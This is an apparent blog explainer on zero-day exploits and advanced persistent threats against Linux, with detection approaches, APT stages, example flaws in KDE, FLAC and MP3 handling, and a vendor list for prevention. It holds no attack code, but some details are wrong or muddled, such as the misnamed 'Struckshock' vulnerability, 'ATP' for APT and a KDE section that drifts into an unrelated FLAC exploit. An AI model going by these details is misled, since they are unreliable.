It was once the popular opinion that Linux was immune to zero-day exploits. However, even before the Equifax exploit, vulnerabilities were found in Linux distributions like Fedora and Ubuntu. In particular, back in 2016, a security researcher discovered that you could exploit a Linux system by playing a specific music file. Then, in 2017, a group of attackers used Struckshock vulnerability to carry on the attack on Equifax. These zero-day attacks are Advanced Persistent Attacks that exploit recently discovered vulnerabilities. Read on to learn more about what are zero-day exploits and how they can affect a Linux system.
Recommended Read : Easy way to integrate Apache with modsecurity on Ubuntu
What Are Zero-Day Exploits?
Zero-day refers to a recently discovered vulnerability that attackers can exploit to get cause damage to systems. The severity of these threats rests in that most of the time only the attacker is aware of the existence of this vulnerability, lurking and exploiting it for years, even selling them on the black market. These vulnerabilities are considered to be in their “zero-day” up to the day the vendor notices or becomes aware of the exploit. This means day zero is the day the vendor discovers the vulnerability and starts developing a fix.
How Do You Detect a Zero-Day Attack?
Understandably, zero-day attacks are very difficult to detect due to their very nature. However, there are a number of strategies to make it easier to spot them:
- Statistics-based detection—this method uses machine learning to collect data from previous exploits, creating a baseline for safe system behavior. This method works well in a hybrid solution, although it is subject to false positives.
- Signature-based detection—uses signature libraries, such as databases of malware, as a reference when scanning for threats. Next, it uses machine learning to analyze and create signatures for existing malware, enabling the detection of new vulnerabilities or threats.
- Behavior-based detection—detects the malware by analyzing it interactions with existing software to predict if it is malicious behavior or not.
- Hybrid detection—this method combines the other three techniques to maximize their strengths and minimize their weaknesses.
What Is an Advanced Persistent Threat Attack?
An advanced persistent threat (APT) refers to an attack campaign in which an adversary establishes an unauthorized, long-presence on a system to extract sensitive data. Often the victims of these attacks are large organizations or government networks. As such, the consequences of these intrusions are severe, including:
- Stealing intellectual property
- Personal identifying data
- Credit card information
- Credential thefts
- Sabotage of critical infrastructure
- Lateral movement attacks
Executing an APT assault requires more resources than a standard web application attack. The perpetrators have usually experienced cybercriminals with financial backing. It is not unusual for APT attacks to be used in the context of cyber warfare with political motives—and government funding.
Thus, APTs differ from traditional web application threats in that they:
- Are more complex
- Involve infiltration and lurking on the network as long as possible.
- Often intrude an entire network not only a specific part.
Attacks such as SQL injections and cross-site scripting are used by perpetrators to gain entrance to a targeted network, after which they will use Trojans and backdoor shells to expand and establish the presence inside the network.
A successful APT attack has three stages. First, the attacker infiltrates the network, through web assets, network resources or authorized human users. The adversary uses malicious uploads, or social engineering attacks, which often include a simultaneous DDoS attack, in order to breach the security perimeter. Once they get in, attackers install a backdoor shell, which grants network access and enables them to execute remote operations.
The second stage involves broadening their foothold, moving up in the organization’s hierarchy, compromising staff members accounts, gathering critical information.
Next, they move the stolen information inside a secure location within the target waiting for enough data to be collected and then used. Often, attackers sell the data or use it as blackmail.
Examples of Zero-day vulnerabilities and exploits
Zero-day Exploit In KDE
The KDE Frameworks is a collection of libraries and software frameworks by KDE, available to any Qt-based software stacks or applications on multiple operating systems. It is currently adopted by several Linux distros, including Kubuntu. A vulnerability was discovered affecting the KDE Frameworks package 5.60.0 and before, caused by the way the KDesktop File manages .desktop or .directory files.
The FLAC exploit starts working when a person using Fedora 25 opens a booby-trapped web page, with only one click, the file opens the system calculator. Next, it loads the code that the attacker wishes, using the victim’s system privileges to execute the code. Although Linux users go for the principle of least privilege, they can still be exploited to steal sensitive data. The attacker can lurk even after several reboots, combining with a root exploit to get admin rights.
As shown by its name, the MP3 exploit uses a music file to lure victims. Once a user opens a folder containing the music file the attackers gain entrance to the system, enabling them to modify the code for malicious purposes. You can check this video on Youtube that shows how it works in Ubuntu 16.04 LTS as an example. This attack can also apply to Fedora and other Linux distributions.
How To Prevent Zero-Day Exploits
However difficult to detect, there are several techniques and commercial solutions that help prevent advanced persistent threats and zero-day attacks. The top six vendors include:
- FireEye Endpoint Security. .
- Symantec Endpoint Protection
- RSA NetWitness Endpoint.
- CrowdStrike Falcon Insight.
- Cybereason Endpoint Detection and Response
- Cynet 360 Security Platform.
A security solution targeting ATPs typically includes the following features:
Monitoring the input and output is the base to prevent the breach of the perimeter and installation of backdoors. Tools such as web application firewalls (WAF) can help filter traffic coming to your network, weeding out attacks such as SQL injections, which are used in the first stage of an ATP.
Monitoring internal and incoming traffic completes the perimeter surveillance while helping detect internal traffic anomalies that can be a sign that an attacker gained entrance and at the same time intercepting remote requests.
It is one of the most common prevention techniques in use, useful to minimize available attack surfaces. However, since most malicious software comes disguised as legitimate requests or programs, this whitelisting is not completely effective.
Insider threats are a major stronghold of zero-day attacks. After all, it’s easier to gain entrance to a system with some help from the inside. Therefore, limiting access to the strict minimum is imperative.
Other features to look for include threat hunting capabilities and user behavior analytics.
The last wave of data breaches, such as the WannaCry disaster in 2017, has transformed cybersecurity into a race against time, and against the attackers. While Linux was once believed to be “safe” from zero-day attacks, the last security events and drills have proved otherwise. Organizations can prevent advanced persistent threats by deploying security measures geared specifically to protect from them.